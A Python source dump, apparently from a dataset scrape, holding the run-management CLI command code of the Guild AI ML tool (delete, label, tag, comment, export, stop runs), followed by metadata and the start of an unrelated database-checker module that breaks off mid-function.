shortened_op_dir = run_util.shorten_op_dir(op_dir, cwd)
return _dim_style(" (%s)" % shortened_op_dir, apply_style)
def _dim_style(s, apply_style):
if apply_style:
return cli.style(s, dim=True)
return s
def format_run(run):
formatted = format_runs([run])
if not formatted:
raise ValueError("error formatting %s" % run)
assert len(formatted) == 1, formatted
return formatted[0]
def _no_selected_runs_exit(help_msg=None):
help_msg = (
help_msg or "No matching runs\n" "Try 'guild runs list' to list available runs."
)
cli.out(help_msg, err=True)
raise SystemExit(0)
def runs_op(
args,
ctx,
preview_msg,
confirm_prompt,
no_runs_help,
op_callback,
default_runs_arg=None,
confirm_default=False,
runs_callback=None,
):
get_selected = runs_callback or runs_op_selected
selected = get_selected(args, ctx, default_runs_arg)
if not selected:
_no_selected_runs_exit(no_runs_help)
formatted = None # expensive, lazily init as needed
if not args.yes:
cli.out(preview_msg, err=True)
formatted = format_runs(selected)
cols = [
"short_index",
"op_desc",
"started",
"status_with_remote",
"label",
]
cli.table(formatted, cols, indent=2, err=True)
fmt_confirm_prompt = confirm_prompt.format(count=len(selected))
if not cli.confirm(fmt_confirm_prompt, confirm_default):
raise SystemExit(exit_code.ABORTED)
_apply_runs_op_callback(op_callback, selected, formatted)
def _apply_runs_op_callback(op_callback, selected, formatted):
# pylint: disable=deprecated-method
if len(inspect.getargspec(op_callback).args) == 2:
if formatted is None:
formatted = format_runs(selected)
op_callback(selected, formatted)
else:
op_callback(selected)
def runs_op_selected(args, ctx, default_runs_arg=None):
default_runs_arg = default_runs_arg or ALL_RUNS_ARG
runs_arg = _remove_duplicates(args.runs or default_runs_arg)
filtered = filtered_runs(args, ctx)
return select_runs(filtered, runs_arg, ctx)
def _remove_duplicates(vals):
deduped = []
for val in vals:
if val not in deduped:
deduped.append(val)
return deduped
def delete_runs(args, ctx=None):
if args.remote:
remote_impl_support.delete_runs(args)
else:
_delete_runs(args, ctx)
def _delete_runs(args, ctx):
if args.permanent:
preview = cmd_impl_support.format_warn(
"WARNING: You are about to permanently delete the following runs:"
)
confirm = "Permanently delete {count} run(s)?"
else:
preview = "You are about to delete the following runs:"
confirm = "Delete {count} run(s)?"
no_runs_help = "Nothing to delete."
def delete(selected):
stoppable = [
run for run in selected if run.status == "running" and not run.remote
]
if stoppable and not args.yes:
cli.out(
cmd_impl_support.format_warn(
"WARNING: One or more runs are still running "
"and will be stopped before being deleted."
),
err=True,
)
if not cli.confirm("Really delete these runs?"):
raise SystemExit(exit_code.ABORTED)
for run in stoppable:
_stop_run(run, no_wait=True)
var.delete_runs(selected, args.permanent)
if args.permanent:
cli.out("Permanently deleted %i run(s)" % len(selected), err=True)
else:
cli.out("Deleted %i run(s)" % len(selected), err=True)
runs_op(
args,
ctx,
preview,
confirm,
no_runs_help,
delete,
confirm_default=not args.permanent,
)
def purge_runs(args, ctx):
if args.remote:
remote_impl_support.purge_runs(args)
else:
_purge_runs(args, ctx)
def _purge_runs(args, ctx):
preview = cmd_impl_support.format_warn(
"WARNING: You are about to permanently delete the following runs:"
)
confirm = "Permanently delete {count} run(s)?"
no_runs_help = "Nothing to purge."
def purge(selected):
var.purge_runs(selected)
cli.out("Permanently deleted %i run(s)" % len(selected), err=True)
runs_op(args.copy(deleted=True), ctx, preview, confirm, no_runs_help, purge)
def restore_runs(args, ctx):
if args.remote:
remote_impl_support.restore_runs(args)
else:
_restore_runs(args, ctx)
def _restore_runs(args, ctx):
preview = "You are about to restore the following runs:"
confirm = "Restore {count} run(s)?"
no_runs_help = "Nothing to restore."
def restore(selected):
var.restore_runs(selected)
cli.out("Restored %i run(s)" % len(selected), err=True)
runs_op(
args.copy(deleted=True),
ctx,
preview,
confirm,
no_runs_help,
restore,
confirm_default=True,
)
def run_info(args, ctx):
if args.remote:
remote_impl_support.run_info(args)
else:
_run_info(args, ctx)
def _run_info(args, ctx):
run = one_run(args, ctx)
_print_run_info(run, args)
def one_run(args, ctx):
filtered = filtered_runs(args, ctx=ctx)
if not filtered:
cli.error("no matching runs")
runspec = args.run or "1"
selected = select_runs(filtered, [runspec], ctx)
return cmd_impl_support.one_run(selected, runspec, ctx)
def _print_run_info(run, args):
data = _run_info_data(run, args)
if args.json:
_print_run_info_json(data)
else:
_print_run_info_ordered(data)
def _run_info_data(run, args):
data = []
_append_attr_data(run, args.private_attrs, data)
data.append(("tags", run.get("tags") or []))
data.append(("flags", run.get("flags") or {}))
proto = run.batch_proto
if proto:
data.append(("proto-flags", proto.get("flags") or {}))
data.append(("scalars", _scalar_info(run, args)))
if args.comments:
data.append(("comments", _format_comments_for_run_info(run)))
if args.env:
data.append(("environment", run.get("env") or {}))
if args.manifest:
data.append(("manifest", _format_run_manifest(run)))
if args.deps:
data.append(("dependencies", run.get("deps") or {}))
if args.private_attrs and args.json:
_maybe_append_proto_data(run, data)
return data
def _format_comments_for_run_info(run):
return [
_format_comment_for_run_info(comment) for comment in (run.get("comments") or [])
]
def _format_comment_for_run_info(comment):
if not isinstance(comment, dict):
return repr(comment)
return {
"user": comment.get("user") or "",
"host": comment.get("host") or "",
"time": util.format_timestamp(comment.get("time")),
"body": (comment.get("body") or "").strip(),
}
def _append_attr_data(run, include_private, data):
fmt_run = format_run(run)
for name in RUN_DETAIL:
data.append((name, fmt_run[name]))
for name in other_attr_names(run, include_private):
data.append((name, run_util.format_attr(run.get(name))))
if include_private:
data.append(("opref", str(run.opref)))
data.append(("op", run.get("op")))
def other_attr_names(run, include_private=False):
core_attrs = CORE_RUN_ATTRS + LEGACY_RUN_ATTRS
if include_private:
include = lambda x: x not in core_attrs
else:
include = lambda x: x[0] != "_" and x not in core_attrs
return [name for name in sorted(run.attr_names()) if include(name)]
def _scalar_info(run, args):
try:
return _scalar_info_(run, args)
except Exception as e:
if log.getEffectiveLevel() <= logging.DEBUG:
log.exception("get scalars")
return cmd_impl_support.format_warn("ERROR: %s" % e)
def _scalar_info_(run, args):
return {
key: val
for key, val in _iter_scalars(run, args)
if args.all_scalars or filter_default_scalar(key)
}
def filter_default_scalar(key):
_prefix, tag = _split_scalar_key(key)
return not tag.startswith("sys/")
def _split_scalar_key(key):
parts = key.split("#", 1)
return ("", parts[0]) if len(parts) == 1 else (parts[0], parts[1])
def _iter_scalars(run, args):
from guild import index as indexlib # expensive
for s in indexlib.iter_run_scalars(run):
key = run_util.run_scalar_key(s)
if args.all_scalars:
yield key, _scalar_vals(s, args)
else:
yield key, _scalar_last_val(s, args)
def _scalar_vals(s, args):
return {
"first": _scalar_val(s, "first_val", "first_step", args.json),
"last": _scalar_val(s, "last_val", "last_step", args.json),
"min": _scalar_val(s, "min_val", "min_step", args.json),
"max": _scalar_val(s, "max_val", "min_step", args.json),
"avg": _scalar_val(s, "avg_val", "count", args.json),
"total": _scalar_val(s, "total", "count", args.json),
}
def _scalar_last_val(s, args):
return _scalar_val(s, "last_val", "last_step", args.json)
def _scalar_val(s, val_key, step_key, format_json):
val = s[val_key]
step = s[step_key]
if format_json:
return val, step
else:
return _format_scalar_val(val, step)
def _format_scalar_val(val, step):
if isinstance(val, float):
return "%f (step %i)" % (val, step)
# Defensive here - val should None but we don't assert because
# this is a summary op.
val = "nan" if val is None else val
return "%s (step %i)" % (val, step)
def _comments_info(run, args):
return [
_format_comment_info(comment, args) for comment in run.get("comments") or []
]
def _format_comment_info(comment, args):
if args.json:
return comment
return "%s %s\n%s" % (
_format_comment_user(comment),
util.format_timestamp(comment.get("time")),
comment.get("body") or "",
)
def _res_sources_paths(sources):
paths = []
for source_paths in sources.values():
paths.extend(source_paths)
return sorted(paths)
def _format_run_manifest(run):
from guild import run_manifest
try:
m = run_manifest.manfiest_for_run(run)
except Exception as e:
log.error("cannot read run manifest: %s", e)
return {}
else:
return _formatted_run_manifest_items(m)
def _formatted_run_manifest_items(m):
formatted = {}
for args in m:
_apply_formatted_manifest_args(args, formatted)
return {name: sorted(items) for name, items in formatted.items()}
def _apply_formatted_manifest_args(args, formatted):
type = args[0]
if type == "s":
_apply_formatted_manifest_sourcecode_file(args[1:], formatted)
elif type == "d":
_apply_formatted_manifest_dep(args[1:], formatted)
def _apply_formatted_manifest_sourcecode_file(args, formatted):
section = formatted.setdefault("sourcecode", [])
section.append(args[0])
def _apply_formatted_manifest_dep(args, formatted):
section = formatted.setdefault("dependencies", [])
section.append(args[0])
def _maybe_append_proto_data(run, data):
proto = run.batch_proto
if proto:
proto_data = []
_append_attr_data(proto, True, proto_data)
data.append(("proto-run", proto_data))
def _print_run_info_json(data):
data = _tuple_lists_to_dict(data)
cli.out(json.dumps(data))
def _tuple_lists_to_dict(data):
if isinstance(data, list):
if data and isinstance(data[0], tuple):
return {name: _tuple_lists_to_dict(val) for name, val in data}
else:
return [_tuple_lists_to_dict(val) for val in data]
else:
return data
def _print_run_info_ordered(data):
for name, val in data:
if isinstance(val, list):
_print_run_info_list(name, val)
elif isinstance(val, dict):
_print_run_info_dict(name, val)
else:
cli.out("%s: %s" % (name, val))
def _print_run_info_list(name, val):
cli.out("%s:" % name)
for item in val:
if isinstance(item, dict):
cli.out(" -")
for item_name, item_val in sorted(item.items()):
encoded = _fix_quoted_string(flag_util.encode_flag_val(item_val))
if "\n" in encoded:
cli.out(_indent("%s: |" % item_name, 4))
cli.out(_indent(_unindent(encoded), 6))
else:
cli.out(_indent("%s: %s" % (item_name, encoded), 4))
else:
cli.out(" - %s" % flag_util.encode_flag_val(item))
def _print_run_info_dict(name, val):
cli.out("%s:" % name)
for item_name, item_val in _sort_run_info_attr(name, val):
if isinstance(item_val, list):
cli.out(" %s:" % item_name)
for item_item in item_val:
cli.out(" - %s" % flag_util.encode_flag_val(item_item))
elif isinstance(item_val, dict):
cli.out(" %s:" % item_name)
# Use full YAML formatting for config blocks.
cli.out(_indent(yaml_util.encode_yaml(item_val), 4))
else:
cli.out(" %s: %s" % (item_name, flag_util.encode_flag_val(item_val)))
def _sort_run_info_attr(name, val):
if name == "scalars":
return _sort_run_info_scalars(val)
else:
return sorted(val.items())
def _sort_run_info_scalars(val):
key = lambda item: _split_scalar_key(item[0])
return sorted(val.items(), key=key)
def _indent(s, spaces):
prefix = " " * spaces
return "\n".join(["%s%s" % (prefix, line) for line in s.split("\n")])
def _fix_quoted_string(s):
if s.startswith("'") and s.endswith("'"):
return s[1:-1]
return s
def _unindent(s):
return "\n".join([line.strip() for line in s.split("\n")])
def label(args, ctx):
_check_label_args(args, ctx)
if args.remote:
remote_impl_support.label_runs(args)
else:
_set_labels(args, ctx)
def _check_label_args(args, ctx):
cmd_impl_support.check_required_args(
[
"set",
"append",
"prepend",
"remove",
"clear",
],
args,
ctx,
)
cmd_impl_support.check_incompatible_args(
[
("set", "append"),
("set", "prepend"),
("set", "remove"),
("set", "clear"),
("append", "prepend"),
("append", "clear"),
("append", "remove"),
("prepend", "clear"),
("prepend", "remove"),
],
args,
ctx,
)
def _set_labels(args, ctx):
preview = _set_labels_preview(args)
confirm = "Continue?"
no_runs = "No runs to modify."
def set_labels(selected):
for run in selected:
if args.clear:
run.del_attr("label")
else:
run.write_attr("label", _label_for_run(run, args).strip())
if args.clear:
cli.out("Cleared label for %i run(s)" % len(selected), err=True)
else:
cli.out("Labeled %i run(s)" % len(selected), err=True)
runs_op(args, ctx, preview, confirm, no_runs, set_labels, LATEST_RUN_ARG, True)
def _set_labels_preview(args):
if args.set:
return "You are about to label the following runs with '%s':" % args.set
elif args.prepend:
return (
"You are about to prepend '%s' to the label of the following runs:"
% args.prepend
)
elif args.append:
return (
"You are about to append '%s' to the label of the following runs:"
% args.append
)
elif args.remove:
return (
"You are about to remove '%s' from the label of the following runs:"
% args.remove
)
elif args.clear:
return "You are about to clear the label of the following runs:"
else:
assert False, args
def _label_for_run(run, args):
if args.set:
return format_run_label(args.set, run)
elif args.prepend:
return "%s %s" % (format_run_label(args.prepend, run), _run_label(run))
elif args.append:
return "%s %s" % (_run_label(run), format_run_label(args.append, run))
elif args.remove:
return _remove_label_parts(args.remove, _run_label(run))
def format_run_label(template, run):
fmt_params = run.get("flags") or {}
fmt_params["label"] = _run_label(run)
return op_util.run_label(template, fmt_params).strip()
def _run_label(run):
return run.get("label") or ""
def _remove_label_parts(parts, label):
for part in parts:
label = _remove_label_part(part, label)
return label
def _remove_label_part(part, label):
try:
split_parts = re.split(r"(^|\s)%s($|\s)" % part, label)
except Exception as e:
cli.error("cannot remove label part %r: %s" % e)
else:
return " ".join([s for s in [t.strip() for t in split_parts] if s])
def stop_runs(args, ctx=None):
if args.remote:
remote_impl_support.stop_runs(args)
else:
_stop_runs(args, ctx)
def _stop_runs(args, ctx):
preview = cmd_impl_support.format_warn("You are about to stop the following runs:")
confirm = "Stop {count} run(s)?"
no_runs_help = "Nothing to stop."
if not args.runs:
args.status_running = True
def stop_f(selected):
for run in selected:
_stop_run(run, args.no_wait)
def select_runs_f(args, ctx, default_runs_arg):
runs = runs_op_selected(args, ctx, default_runs_arg)
return [run for run in runs if not run.remote]
runs_op(
args,
ctx,
preview,
confirm,
no_runs_help,
stop_f,
None,
False,
select_runs_f,
)
def _stop_run(run, no_wait):
remote_lock = remote_run_support.lock_for_run(run)
if remote_lock:
_try_stop_remote_run(run, remote_lock, no_wait)
else:
_try_stop_local_run(run)
def _try_stop_remote_run(run, remote_lock, no_wait):
from guild import plugin as pluginlib # expensive
try:
plugin = pluginlib.for_name(remote_lock.plugin_name)
except LookupError:
log.warning(
"error syncing run '%s': plugin '%s' not available",
run.id,
remote_lock.plugin_name,
)
else:
cli.out("Stopping %s (remote)" % run.id, err=True)
plugin.stop_run(run, dict(no_wait=no_wait))
def _try_stop_local_run(run):
pid = run.pid
if pid and util.pid_exists(pid):
cli.out("Stopping %s (pid %i)" % (run.id, run.pid), err=True)
_gone, alive = util.kill_process_tree(
pid, timeout=STOP_TIMEOUT, child_term_timeout=CHILD_TERM_TIMEOUT
)
if alive:
_handle_non_stopped_pids(alive)
def _handle_non_stopped_pids(alive):
alive_desc = ", ".join(alive)
cli.out("The following processes did not stop as expected: %s" % alive_desc)
cli.error()
def export(args, ctx):
preview = "You are about to %s the following runs to '%s':" % (
args.move and "move" or "copy",
args.location,
)
confirm = "Continue?"
no_runs = "No runs to export."
def export_f(selected):
if args.copy_resources and not args.yes:
cli.out(
cmd_impl_support.format_warn(
"WARNING: You specified --copy-resources, which will "
"copy resources used by each run."
),
err=True,
)
if not cli.confirm("Really copy resources exported runs?"):
raise SystemExit(exit_code.ABORTED)
try:
exported = run_util.export_runs(
selected,
args.location,
move=args.move,
copy_resources=args.copy_resources,
)
except run_util.RunsExportError as e:
cli.error(e.args[0])
else:
cli.out(
"Exported %i run(s) to %s" % (len(exported), args.location), err=True
)
runs_op(args, ctx, preview, confirm, no_runs, export_f, ALL_RUNS_ARG, True)
def import_(args, ctx):
if not os.path.exists(args.archive):
cli.error("archive '%s' does not exist" % args.archive)
if _is_zip_archive(args.archive):
if args.move:
cli.error("'--move' cannot be used with zip archives")
elif os.path.isfile(args.archive):
cli.error(
"invalid archive %s - expected a directory or a zip file" % args.archive
)
preview = "You are about to import (%s) the following runs from '%s':" % (
args.move and "move" or "copy",
args.archive,
)
confirm = "Continue?"
no_runs = "No runs to import."
def import_f(selected):
if args.copy_resources and not args.yes:
cli.out(
cmd_impl_support.format_warn(
"WARNING: You specified --copy-resources, which will "
"copy resources used by each run."
),
err=True,
)
if not cli.confirm("Really copy resources exported runs?"):
raise SystemExit(exit_code.ABORTED)
try:
imported = run_util.import_runs(
selected,
move=args.move,
copy_resources=args.copy_resources,
)
except run_util.RunsImportError as e:
cli.error(e.args[0])
cli.out("Imported %i run(s) from %s" % (len(imported), args.archive), err=True)
runs_op(args, ctx, preview, confirm, no_runs, import_f, ALL_RUNS_ARG, True)
def _is_zip_archive(path):
return path.lower().endswith(".zip")
def push(args, ctx):
preview = "You are about to copy (push%s) the following runs to %s:" % (
_delete_clause(args),
args.remote,
)
confirm = "Continue?"
no_runs = "No runs to copy."
def push_f(runs):
remote_impl_support.push_runs(runs, args)
runs_op(
args.copy(remote=None),
ctx,
preview,
confirm,
no_runs,
push_f,
ALL_RUNS_ARG,
True,
)
def _delete_clause(args):
if args.delete:
return " with delete"
else:
return ""
def pull(args, ctx):
preview = "You are about to copy (pull%s) the following runs from %s:" % (
_delete_clause(args),
args.remote,
)
confirm = "Continue?"
no_runs = "No runs to copy."
def pull_f(runs):
remote_impl_support.pull_runs(runs, args)
def filtered_runs_f(args, _ctx, _default_runs_arg):
filtered = remote_impl_support.filtered_runs(args)
return select_runs(filtered, args.runs, ctx)
runs_op(
args,
ctx,
preview,
confirm,
no_runs,
pull_f,
ALL_RUNS_ARG,
True,
filtered_runs_f,
)
def mark(args, ctx=None):
if args.clear:
_clear_marked(args, ctx)
else:
_mark(args, ctx)
def _clear_marked(args, ctx):
preview = "You are about to unmark the following runs:"
confirm = "Continue?"
no_runs = "No runs to unmark."
def clear(selected):
for run in selected:
run.del_attr("marked")
cli.out("Unmarked %i run(s)" % len(selected), err=True)
if not args.runs:
args.filter_marked = True
runs_op(args, ctx, preview, confirm, no_runs, clear, ALL_RUNS_ARG, True)
def _mark(args, ctx):
preview = "You are about to mark the following runs:"
confirm = "Continue?"
no_runs = "No runs to mark."
def mark(selected):
for run in selected:
run.write_attr("marked", True)
cli.out("Marked %i run(s)" % len(selected), err=True)
if not args.runs:
args.filter_marked = True
runs_op(args, ctx, preview, confirm, no_runs, mark, LATEST_RUN_ARG, True)
def select(args, ctx):
_check_select_args(args, ctx)
_maybe_apply_select_all(args)
if args.all:
_print_all_selected_runs(args, ctx)
else:
_print_latest_selected_run(args, ctx)
def _check_select_args(args, ctx):
cmd_impl_support.check_incompatible_args(
[
("short_id", "attr"),
("min", "max"),
],
args,
ctx,
)
def _maybe_apply_select_all(args):
if len(args.runs) > 1 and not args.min and not args.max:
args.all = True
elif args.min or args.max:
args.all = False
def _print_all_selected_runs(args, ctx):
for run in _select_runs(args, ctx):
_print_select_info(run, args)
def _print_latest_selected_run(args, ctx):
run = select_run(args, ctx)
_print_select_info(run, args)
def select_run(args, ctx=None):
_check_select_run_args(args, ctx)
if args.min:
return _select_min_run(args, ctx, args.min)
elif args.max:
return _select_min_run(args, ctx, args.max, reverse=True)
else:
args.run = args.runs[0] if args.runs else None
return one_run(args, ctx)
def _check_select_run_args(args, ctx):
cmd_impl_support.check_incompatible_args([("min", "max")], args, ctx)
def _select_min_run(args, ctx, colspec, reverse=False):
runs = _select_runs(args, ctx)
assert runs # _select_runs exits early if nothing matches.
return _sort_selected_runs(runs, colspec, reverse)[0]
def _select_runs(args, ctx):
return runs_for_args(args, ctx=ctx)
def _sort_selected_runs(runs, colspec, reverse):
from guild import index as indexlib # expensive
colspec_val_for_run = _colspec_val_f(colspec)
index = indexlib.RunIndex()
index.refresh(runs, ["scalar", "flag", "attr"])
def key(run):
val = colspec_val_for_run(run, index)
log.debug("got %r for '%s' for run %s", val, colspec, run.id)
return val
return util.natsorted(runs, key=key, reverse=reverse)
def _colspec_val_f(colspec):
from guild import query
try:
cols = query.parse_colspec(colspec).cols
except query.ParseError as e:
cli.error("invalid col spec '%s': %s" % (colspec, e))
else:
assert cols, colspec
if len(cols) > 1:
cli.error("invalid col spec '%s': multiple cols not supported" % colspec)
col = cols[0]
if isinstance(col, query.Scalar):
return _scalar_val_f(col)
elif isinstance(col, query.Flag):
return _flag_val_f(col)
elif isinstance(col, query.Attr):
return _attr_val_f(col)
def _scalar_val_f(col):
if col.named_as:
log.warning("ignoring 'as %s' in scalar", col.named_as)
prefix, tag = col.split_key()
def f(run, index):
return index.run_scalar(run, prefix, tag, col.qualifier, col.step)
return f
def _flag_val_f(col):
def f(run, index):
return index.run_flag(run, col.name)
return f
def _attr_val_f(col):
def f(run, index):
return index.run_attr(run, col.name)
return f
def _print_select_info(run, args):
if args.attr:
_print_run_attr(run, args.attr)
elif args.short_id:
print(run.short_id)
elif args.path:
print(run.dir)
else:
print(run.id)
def _print_run_attr(run, attr_name):
util.try_apply(
[
lambda: _try_print_formatted_run_attr(run, attr_name),
lambda: _try_print_raw_run_attr(run, attr_name),
lambda: _no_such_run_attr_error(attr_name),
]
)
def _try_print_formatted_run_attr(run, attr_name):
formatted = run_util.format_run(run)
try:
val = formatted[attr_name]
except KeyError:
raise util.TryFailed()
else:
print(val)
def _try_print_raw_run_attr(run, attr_name):
try:
val = run[attr_name]
except KeyError:
raise util.TryFailed()
else:
print(yaml_util.encode_yaml(val))
def _no_such_run_attr_error(attr_name):
cli.error("no such run attribute '%s'" % attr_name)
def tag(args, ctx):
_check_tag_args(args, ctx)
if args.remote:
remote_impl_support.tag_runs(args)
else:
if args.list_all:
_list_all_tags(args, ctx)
else:
_set_tags(args, ctx)
def _check_tag_args(args, ctx):
cmd_impl_support.check_required_args(
[
"add",
"delete",
"clear",
"list_all",
],
args,
ctx,
)
cmd_impl_support.check_incompatible_args(
[
("add", "list_all"),
("delete", "list_all"),
("clear", "list_all"),
],
args,
ctx,
)
def _list_all_tags(args, ctx):
selected = runs_op_selected(args, ctx, ALL_RUNS_ARG)
tags = set()
for run in selected:
tags.update(_run_tags(run))
for tag in sorted(tags):
print(tag)
def _run_tags(run):
tags = run.get("tags")
if not tags:
return []
try:
return list(tags)
except Exception as e:
log.warning("Error reading tags for run %s: %s", run.id, e)
return []
def _set_tags(args, ctx):
preview = _set_tags_preview(args)
confirm = "Continue?"
no_runs = "No runs to modify."
def set_tags(selected):
for run in selected:
old_tags = _run_tags(run)
new_tags = _tags_for_run(old_tags, args)
run.write_attr("tags", new_tags)
if args.sync_labels:
new_label = _synced_label_for_tags(run, old_tags, args)
run.write_attr("label", new_label)
cli.out("Modified tags for %i run(s)" % len(selected), err=True)
runs_op(args, ctx, preview, confirm, no_runs, set_tags, LATEST_RUN_ARG, True)
def _set_tags_preview(args):
lines = ["You are about to modify tags for the following runs:"]
if args.sync_labels:
lines.append(
cmd_impl_support.format_warn(
"Labels are updated to reflect the latest tags."
)
)
else:
lines.append(
cmd_impl_support.format_warn(
"Labels are not updated - use --sync-labels to "
"apply changes run labels."
)
)
return "\n".join(lines)
def _tags_for_run(old_tags, args):
tags = set(old_tags or [])
tags.difference_update(old_tags if args.clear else args.delete)
tags.update(args.add)
return sorted(tags)
def _synced_label_for_tags(run, old_tags, args):
tags_to_delete = set(old_tags if args.clear else args.delete)
old_label = run.get("label") or ""
new_label = _remove_label_parts(tags_to_delete, old_label)
tags_to_prepend = _tags_not_in_label(args.add, old_label)
if tags_to_prepend:
new_label = "%s %s" % (" ".join(tags_to_prepend), new_label)
return new_label
def _tags_not_in_label(tags, label):
if not tags:
return []
label_parts = util.shlex_split(label)
return [tag for tag in tags if tag not in label_parts]
def comment(args, ctx):
if args.remote:
_check_comment_args_for_remote(args, ctx)
remote_impl_support.comment_runs(args)
else:
_check_comment_args(args, ctx)
_comment(args, ctx)
def _check_comment_args_for_remote(args, ctx):
_check_comment_args(args, ctx)
cmd_impl_support.check_incompatible_args(
[
("remote", "edit"),
],
args,
ctx,
)
cmd_impl_support.check_required_args(
[
"list",
"add",
"delete",
"clear",
],
args,
ctx,
msg_template="--remote option required on of: %s",
)
def _check_comment_args(args, ctx):
cmd_impl_support.check_incompatible_args(
[
("list", "add"),
("list", "delete"),
("list", "clear"),
("add", "delete"),
("add", "clear"),
("edit", "delete"),
("edit", "clear"),
("delete", "clear"),
],
args,
ctx,
)
def _comment(args, ctx):
if args.list:
_list_comments(args, ctx)
elif args.delete:
_delete_comment(args.delete, args, ctx)
elif args.clear:
_clear_comments(args, ctx)
else:
_add_comment(args, ctx)
def _list_comments(args, ctx):
_list_runs_comments(runs_op_selected(args, ctx, LATEST_RUN_ARG))
def _list_runs_comments(runs, comment_index_format=True):
formatted_runs = format_runs(runs)
cols = [
_col1_for_comments_header(comment_index_format),
"op_desc",
"started",
"status_with_remote",
"label",
]
cli.table(
formatted_runs,
cols,
detail=["_run"],
detail_cb=_run_comments_detail_cb(comment_index_format),
max_width_adj=STYLE_TABLE_WIDTH_ADJ,
fg=_fg_for_comments_header(comment_index_format),
)
def _col1_for_comments_header(comment_index_format):
if comment_index_format:
return "short_id"
else:
return "index"
def _fg_for_comments_header(comment_index_format):
if comment_index_format:
return "yellow"
else:
return None
def _run_comments_detail_cb(comment_index_format):
def f(formatted_run):
run = formatted_run["_run"]
comments = run.get("comments")
if comments:
index = 1
for comment in comments:
_print_comment(index, comment, comment_index_format)
index += 1
else:
_print_no_comments(comment_index_format)
return f
def _print_comment(index, comment, comment_index_format):
from guild import help
out = help.ConsoleFormatter()
out.write_text(_format_comment_header(index, comment, comment_index_format))
out.write_paragraph()
if comment_index_format:
out.indent()
else:
out.indent()
out.indent()
out.write_text(_format_comment_body(comment))
cli.out("".join(out.buffer))
def _format_comment_header(index, comment, comment_index_format):
user = _format_comment_user(comment)
time = _format_comment_time(comment)
if comment_index_format:
return "[%i] %s %s" % (index, user, time)
else:
return " %s %s" % (user, time)
def _format_comment_user(comment):
user = comment.get("user") or ""
host = comment.get("host") or ""
if not host:
return user
return "%s@%s" % (user, host)
def _format_comment_time(comment):
time_attr = comment.get("time")
try:
return util.format_timestamp(time_attr)
except (ValueError, TypeError):
return str(time_attr)
def _format_comment_body(comment):
return comment.get("body") or ""
def _print_no_comments(comment_index_format):
if comment_index_format:
cli.out(" <no comments>")
def _delete_comment(comment_index, args, ctx):
preview = (
"You are about to delete comment %i from the following runs:" % comment_index
)
confirm = "Continue?"
no_runs = "No runs to modify."
def delete_comments(selected):
for run in selected:
new_comments = _delete_run_comment(run, comment_index)
run.write_attr("comments", new_comments)
cli.out("Deleted comment for %i run(s)" % len(selected), err=True)
runs_op(
args,
ctx,
preview,
confirm,
no_runs,
delete_comments,
LATEST_RUN_ARG,
True,
)
def _delete_run_comment(run, comment_index):
comments = run.get("comments")
try:
del comments[comment_index - 1]
except IndexError:
pass
return comments
def _clear_comments(args, ctx):
preview = cmd_impl_support.format_warn(
"WARNING: You are about to delete ALL comments from the following runs:"
)
confirm = "Continue?"
no_runs = "No runs to modify."
def clear_comments(selected):
for run in selected:
run.del_attr("comments")
cli.out("Deleted all comments for %i run(s)" % len(selected), err=True)
runs_op(
args,
ctx,
preview,
confirm,
no_runs,
clear_comments,
LATEST_RUN_ARG,
)
def _add_comment(args, ctx):
runs = runs_op_selected(args, ctx, LATEST_RUN_ARG)
comment, edited = _comment_for_args(args, runs)
if not comment:
cli.out("Aborting due to an empty comment.", err=True)
cli.error()
def add_comment(selected):
for run in selected:
new_comments = _add_run_comment(run, comment, args.user)
run.write_attr("comments", new_comments)
cli.out("Added comment to %i run(s)" % len(selected), err=True)
if edited:
# Skip prompt below because the editor serves as a prompt.
add_comment(runs)
return
preview = "You are about to add a comment to the following runs:"
confirm = "Continue?"
no_runs = "No runs to modify."
runs_op(
args,
ctx,
preview,
confirm,
no_runs,
add_comment,
LATEST_RUN_ARG,
True,
lambda *_args: runs,
)
def _comment_for_args(args, runs):
comment = args.add
edited = False
if not comment or args.edit:
comment = _get_comment_with_editor(comment, runs)
edited = True
return comment.strip(), edited
def _get_comment_with_editor(initial_comment, runs):
msg_lines = [
initial_comment or "",
"# Type a comment for the runs below. Lines starting with '#' are ",
"# ignored. An empty comment aborts the command.",
"#",
"# Runs:",
]
formatted_runs = _format_runs_for_comment_msg(runs)
msg_lines.extend(["# %s" % line for line in formatted_runs.split("\n")])
return util.edit(
"\n".join(msg_lines),
extension=".GUILD_COMMENT",
strip_comment_lines=True,
)
def _format_runs_for_comment_msg(runs):
out = six.StringIO()
formatted = format_runs(runs)
cols = [
"short_index",
"op_desc",
"started",
"status_with_remote",
"label",
]
cli.table(formatted, cols, indent=2, file=out)
return out.getvalue().strip()
def _add_run_comment(run, comment, user):
from . import run_impl
comments = run.get("comments") or []
if user:
user, host = _split_comment_user(user)
if not host:
host = util.hostname()
else:
user = util.user()
host = util.hostname()
comments.append(
{
"body": comment,
"user": user,
"host": host,
"time": run_impl.comment_timestamp(),
}
)
return comments
def _split_comment_user(user):
parts = user.split("@", 1)
if len(parts) == 2:
return parts
return parts[0], None
| 26.400097
| 88
| 0.615258
|
4a18e97517b8146db954c806cb011e5da1eb08d9
| 2,799
|
py
|
Python
|
database/db_checker.py
|
KevynTang/vein-project
|
1a49515ac112493c1b6510d9a382c3b64629ba8e
|
[
"MIT"
] | 4
|
2021-10-01T04:54:01.000Z
|
2021-11-10T05:27:01.000Z
|
database/db_checker.py
|
KevynTang/vein-project
|
1a49515ac112493c1b6510d9a382c3b64629ba8e
|
[
"MIT"
] | null | null | null |
database/db_checker.py
|
KevynTang/vein-project
|
1a49515ac112493c1b6510d9a382c3b64629ba8e
|
[
"MIT"
] | 2
|
2021-09-27T05:31:34.000Z
|
2022-01-29T00:43:27.000Z
|
from database.db_reader import read_from_db, check_table_exist, check_table_not_empty
from database import date_getter
def get_standard_latest_trade_date(frequency='daily'):
if frequency == 'quarter':
return date_getter.get_quarter_end_date_before()
else:
return date_getter.get_trade_date_before(frequency=frequency.upper())
def get_latest_trade_date_from_table(table_name, column_name='TRADE_DATE'):
return read_from_db(
f'''SELECT {column_name} FROM {table_name} ORDER BY {column_name} DESC LIMIT 1;'''
)[column_name][0]
def no_checker(table_name):
return {
'type': '无检测',
'need_fill': True,
'fill_controller': {}
}
def light_checker(table_name):
"""
检测到该涨表存在且表中记录大于零条
就算做检测通过
:param table_name: 表名
:return: 一个包含状态信息的report json
"""
if not check_table_exist(table_name):
return {
'type': '轻检测',
'need_fill': False,
'fill_controller': {}
}
if check_table_not_empty(table_name):
return {
'type': '轻检测',
'need_fill': False,
'fill_controller': {}
}
else:
return {
'type': '轻检测',
'need_fill': True,
'fill_controller': {}
}
def date_checker(table_name, frequency='daily', column_name='TRADE_DATE'):
